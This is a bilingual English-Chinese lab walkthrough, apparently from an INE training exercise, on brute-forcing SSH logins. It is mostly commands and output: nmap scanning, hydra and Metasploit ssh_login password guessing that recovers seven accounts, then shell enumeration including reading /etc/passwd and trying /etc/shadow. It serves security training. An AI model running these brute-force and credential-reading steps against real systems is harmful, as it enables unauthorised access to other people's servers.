Exploiting SSH
Exploiting SSH
SSH (Secure Shell) is a remote administration protocol that offers encryption and is the successor to Telnet.
It is typically used for remote access to servers and systems.
SSH uses TCP port 22 by default, however, like other services, it can be configured to use any other open TCP port.
SSH authentication can be configured in two way:
- Username & password authentication
- Key based authentication
In the case of username and password authentication, we can perform a brute-force attack on the SSH server in order to identify legitimate credentials and consequently gain access to the target system.
利用 SSH
利用 SSH
SSH(安全外壳)是一种提供加密的远程管理协议,是 Telnet 的继承者。
它通常用于远程访问服务器和系统。
SSH 默认使用 TCP 端口 22,但是,与其他服务一样,它可以配置为使用任何其他开放的 TCP 端口。
SSH 身份验证可以通过两种方式进行配置:
- 用户名和密码验证
- 基于密钥的身份验证
Key based authentication involves the use of two keys, or rather a key pair of the public key and the private key, whereby the public key is on the server and the private key is given to the person who is going to remote accesss the system via SSH. And within key based authentication, there is no username and password, you actually login to the target system by providing the private key, and only one person has private key.
在用户名和密码验证的情况下,我们可以对 SSH 服务器执行暴力攻击,以识别合法凭据,从而获得对目标系统的访问权限。
Demo: Exploiting SSH
1
2
3
ifconfig
eth1: inet 192.156.211.2
1
nmap -sV 192.156.211.3
1
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt 192.156.211.3 -t 4 ssh
Display the groups that the sysadmin is a part of. It is not a part of sudo group, which means we don’t have any elevated privileges.
Enumerate the distribution release version.
Get kernel version.
Enumerate the users on the system.
1
2
3
4
5
6
7
8
9
10
ssh sysadmin@192.156.211.3
yes
hailey
sysadmin@victim-1:~$ whoami
sysadmin@victim-1:~$ groups sysadmin
sysadmin@victim-1:~$ cat /etc/*issue
sysadmin@victim-1:~$ uname -r
sysadmin@victim-1:~$ cat /etc/passwd
SSH登录
概述
在本实验中,针对目标运行以下辅助模块:
- auxiliary/scanner/ssh/ssh_version
- auxiliary/scanner/ssh/ssh_login
指示:
- 这个实验室是献给你的!此网络上没有其他用户 :)
- 开始实验室后,您将可以访问 Kali 实例的根终端
- 你的 Kali 有一个 IP 地址为 192.XY2 的接口。运行“ip addr”以了解 X 和 Y 的值。
- 目标服务器应位于 IP 地址 192.XY3。
- 不要攻击位于 IP 地址 192.XY1 的网关
- 使用
/usr/share/metasploit-framework/data/wordlists/common_users.txt用户名字典 - 使用
/usr/share/metasploit-framework/data/wordlists/common_passwords.txt密码字典
我自己的思路
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.5 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:05 txqueuelen 0 (Ethernet)
RX packets 124 bytes 11106 (10.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 107 bytes 343757 (335.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.180.250.2 netmask 255.255.255.0 broadcast 192.180.250.255
ether 02:42:c0:b4:fa:02 txqueuelen 0 (Ethernet)
RX packets 16 bytes 1432 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 18 bytes 1656 (1.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 1656 (1.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
1
2
3
4
5
6
7
8
9
10
11
12
root@attackdefense:~# nmap -sV 192.180.250.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-20 03:39 UTC
Nmap scan report for target-1 (192.180.250.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:42:C0:B4:FA:03 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt 192.180.250.3 -t 4 sshHydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-20 03:49:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 350 login tries (l:7/p:50), ~88 tries per task
[DATA] attacking ssh://192.180.250.3:22/
[22][ssh] host: 192.180.250.3 login: sysadmin password: hailey
[STATUS] 74.00 tries/min, 74 tries in 00:01h, 276 to do in 00:04h, 4 active
[22][ssh] host: 192.180.250.3 login: rooty password: pineapple
[22][ssh] host: 192.180.250.3 login: demo password: butterfly1
[22][ssh] host: 192.180.250.3 login: auditor password: xbox360
[STATUS] 67.33 tries/min, 202 tries in 00:03h, 148 to do in 00:03h, 4 active
[STATUS] 60.50 tries/min, 242 tries in 00:04h, 108 to do in 00:02h, 4 active
1
2
3
4
sysadmin:hailey
rooty:pineapple
demo:butterfly1
auditor:xbox360
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 30 yes Timeout for the SSH probe
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.180.250.3
RHOSTS => 192.180.250.3
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.180.250.3:22 - SSH server version: SSH-2.0-OpenSSH_7.9p1 Ubuntu-10 ( service.version=7.9p1 openssh.comment=Ubuntu-10 service.vendor=OpenBSD service.family=OpenSSH service.prod
uct=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=19.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:19.04 service.protocol=ssh
fingerprint_db=ssh.banner )
[*] 192.180.250.3:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
SSH登录检查扫描仪
该模块将在一系列机器上测试 ssh 登录并报告成功登录。如果您已加载数据库插件并连接到数据库,此模块将记录成功的登录和主机,以便您可以跟踪您的访问。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
msf5 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.180.250.3
RHOSTS => 192.180.250.3
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.180.250.3:22 - Success: 'sysadmin:hailey' ''
[*] Command shell session 1 opened (192.180.250.2:35857 -> 192.180.250.3:22) at 2022-10-20 04:06:05 +0000
[+] 192.180.250.3:22 - Success: 'rooty:pineapple' ''
[*] Command shell session 2 opened (192.180.250.2:38921 -> 192.180.250.3:22) at 2022-10-20 04:07:27 +0000
[+] 192.180.250.3:22 - Success: 'demo:butterfly1' ''
[*] Command shell session 3 opened (192.180.250.2:39435 -> 192.180.250.3:22) at 2022-10-20 04:08:57 +0000
[+] 192.180.250.3:22 - Success: 'auditor:xbox360' ''
[*] Command shell session 4 opened (192.180.250.2:38927 -> 192.180.250.3:22) at 2022-10-20 04:10:43 +0000
[+] 192.180.250.3:22 - Success: 'anon:741852963' ''
[*] Command shell session 5 opened (192.180.250.2:44943 -> 192.180.250.3:22) at 2022-10-20 04:12:41 +0000
[+] 192.180.250.3:22 - Success: 'administrator:password1' ''
[*] Command shell session 6 opened (192.180.250.2:45943 -> 192.180.250.3:22) at 2022-10-20 04:15:10 +0000
[+] 192.180.250.3:22 - Success: 'diag:secret' ''
[*] Command shell session 7 opened (192.180.250.2:41153 -> 192.180.250.3:22) at 2022-10-20 04:17:28 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
2
3
4
5
6
7
sysadmin:hailey
rooty:pineapple
demo:butterfly1
auditor:xbox360
anon:741852963
administrator:password1
diag:secret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH sysadmin:hailey (192.180.250.3:22) 192.180.250.2:35857 -> 192.180.250.3:22 (192.180.250.3)
2 shell unknown SSH rooty:pineapple (192.180.250.3:22) 192.180.250.2:38921 -> 192.180.250.3:22 (192.180.250.3)
3 shell unknown SSH demo:butterfly1 (192.180.250.3:22) 192.180.250.2:39435 -> 192.180.250.3:22 (192.180.250.3)
4 shell unknown SSH auditor:xbox360 (192.180.250.3:22) 192.180.250.2:38927 -> 192.180.250.3:22 (192.180.250.3)
5 shell unknown SSH anon:741852963 (192.180.250.3:22) 192.180.250.2:44943 -> 192.180.250.3:22 (192.180.250.3)
6 shell unknown SSH administrator:password1 (192.180.250.3:22) 192.180.250.2:45943 -> 192.180.250.3:22 (192.180.250.3)
7 shell unknown SSH diag:secret (192.180.250.3:22) 192.180.250.2:41153 -> 192.180.250.3:22 (192.180.250.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
Welcome to Ubuntu 19.04 (GNU/Linux 5.4.0-125-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
whoami
sysadmin
groups sysadmin
sysadmin : sysadmin
cat /etc/*issue
Ubuntu 19.04 \n \l
uname -a
Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sysadmin:x:1000:1000:,,,:/home/sysadmin:/bin/bash
rooty:x:1001:1001:,,,:/home/rooty:/bin/bash
demo:x:1002:1002:,,,:/home/demo:/bin/bash
auditor:x:1003:1003:,,,:/home/auditor:/bin/bash
anon:x:1004:1004:,,,:/home/anon:/bin/bash
administrator:x:1005:1005:,,,:/home/administrator:/bin/bash
diag:x:1006:1006:,,,:/home/diag:/bin/bash
cat /etc/shadow
cat: /etc/shadow: Permission denied
cat /flag
eb09cc6f1cd72756da145892892fbf5a
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1526.pdf
